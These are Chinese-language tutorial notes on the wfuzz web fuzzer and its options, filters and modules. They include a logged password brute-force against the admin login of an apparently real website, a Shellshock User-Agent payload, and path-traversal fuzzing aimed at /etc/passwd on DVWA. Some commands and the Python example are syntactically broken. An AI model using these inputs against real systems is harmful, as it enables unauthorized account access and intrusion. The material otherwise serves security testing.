wfuzz

  • Python语言编写的Fuzzer

    • 功能多、速度快、灵活性高、可扩展
    • 从所有入口向服务器提交数据( IP、域名、端口、方法、变量、头部…)
    • 使用占位符标识注入点( FUZZ )
    • 指定Payload进行替换提交数据
  • Payload模块(encoders/iterators/scripts/printers)

    • wfuzz -e payloads

    • wfuzz -z help --slice file payload详细信息

    • wfuzz -z range,1-254 -z file,a.txt --hc 404 http://1.1.1.FUZZ/FUZ2Z

    • -Z --conn-delay 3 --req-delay 3

    • wfuzz -z range,1-254 -z file,a.txt --hh BBB http://1.1.1.FUZZ{b}/FUZ2Z{a}

    •       /usr/share/wordlists                            23s   [email protected]  0.07   14:40:25  
        ❯ wfuzz -c -v -w ./SecLists/Passwords/Common-Credentials/10-million-password-list-top-10000.txt -d "user=admin&pw=FUZZ{a}" --hh BBB -u "http://www.c1moon.com/admin/index.php?action=login"
         /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
        ********************************************************
        * Wfuzz 3.1.0 - The Web Fuzzer                         *
        ********************************************************
        
        Target: http://www.c1moon.com/admin/index.php?action=login
        Total requests: 10000
        
        ====================================================================================================================================================
        ID           C.Time       Response   Lines      Word     Chars       Server                           Redirect                         Payload
        ====================================================================================================================================================
        
        000000001:   1.039s       200        33 L       100 W    1549 Ch     Microsoft-IIS/8.5                                                 "a"
        000000002:   1.063s       302        1 L        3 W      87 Ch       Microsoft-IIS/8.5                ./                               "123456"
        ^C /usr/lib/python3/dist-packages/wfuzz/wfuzz.py:80: UserWarning:Finishing pending requests...
        
        Total time: 0
        Processed Requests: 141
        Filtered Requests: 139
        Requests/sec.: 0
      
    • wfuzz -H “User- Agent: () { :;}; echo; echo XXX” --ss XXX -w cgi.txt http://a/FUZZ

  • 结果过滤

    • –hc / SC #响应码
    • –hl / sl #响应Body行数
    • –hw / SW #响应Body word数量
    • –hh / sh #响应Body chars数量
    • –hs / SS #响应Body正则匹配
  • –filter

    • wfuzz -c -v -z list,a-b-admin -z list,1-2-password -d "username=FUZZ&password=FUZ2Z&Login=Login" --filter "headers.response.Location='~index.php'" http://url/dvwa/login.php
    • http://wfuzz.readthedocs.io/en/latest/

URL参数

wfuzz -C -V -w /usr/share/wfuzz/wordlist/Injections/Traversal.txt -b
“security= low; PHPSESSID= 898d5fb4a2b85261f1dff1fca1d9b30c” --ss
‘root;x’ -u http://ip/dvwa/vulnerabilities/fi/?page=FUZZ

测试Cookie
wfuzz -z file,a.txt -b cookie =FUZZ - http://ip/

测试Head
wfuzz -z file,a.txt -H “User-Agent: IE99” http://ip/FUZZ

请求方法
wfuzz -z list,GET-HEAD-POST-TRACE-OPTIONS-DELETE-MOVE -X FUZZ ip

使用代理
wfuzz -Z file,a.txt -p ip:8080 http://ip/FUZZ

HTTP身份认证
wfuzz -Z list,user-pass --basic FUZZ:FUZ2Z http://ip/

递归深度
wfuzz -z file,a.txt -R 3 http://ip/FUZZ

速度控制
-t #线程(并发数)
-S #请求间隔

输出格式
wfuzz -f outfile,json -w a.txt http://ip/FUZZ

全局配置~/.wfuzz/wfuzz.ini
cancle_on_plugin_except= 1 #插件异常退出
concurrent plugins = 3 #并发插件上限
lookup_dirs= . #字典文件目录
encode_space = 1 #编码空格键

Iterators模块
wfuzz -e iterators
zip :字典配对 / chain :多字典单变量 / product :默认交叉
wfuzz -z list,a-b-c -z list,1-2-3 -m zip http://ip/FUZZ/FUZ2Z

Encoders模块
●wfuzz -z file,a.txt,md5 http://ip/FUZZ

Script模块
wfuzz --script= robots -z list,robots.txt http://ip/FUZZ

保存调用
wfuzz --script=robots -z list,a.txt --dump-recipe job1 http://ip/FUZZ
wfuzz --recipe job1

预过滤Payload
wfuzz -z list,1-2-1-2-a --slice “FUZZ|u0” http://1.1.1.1/FUZZ

wfuzz库
import wfuzz
a = wfuzz.fuzz(url= “http://ip/FUZZ”, hc=[404] payloads=[( file ,dict(fn="a.txt ))
for r in a:
print r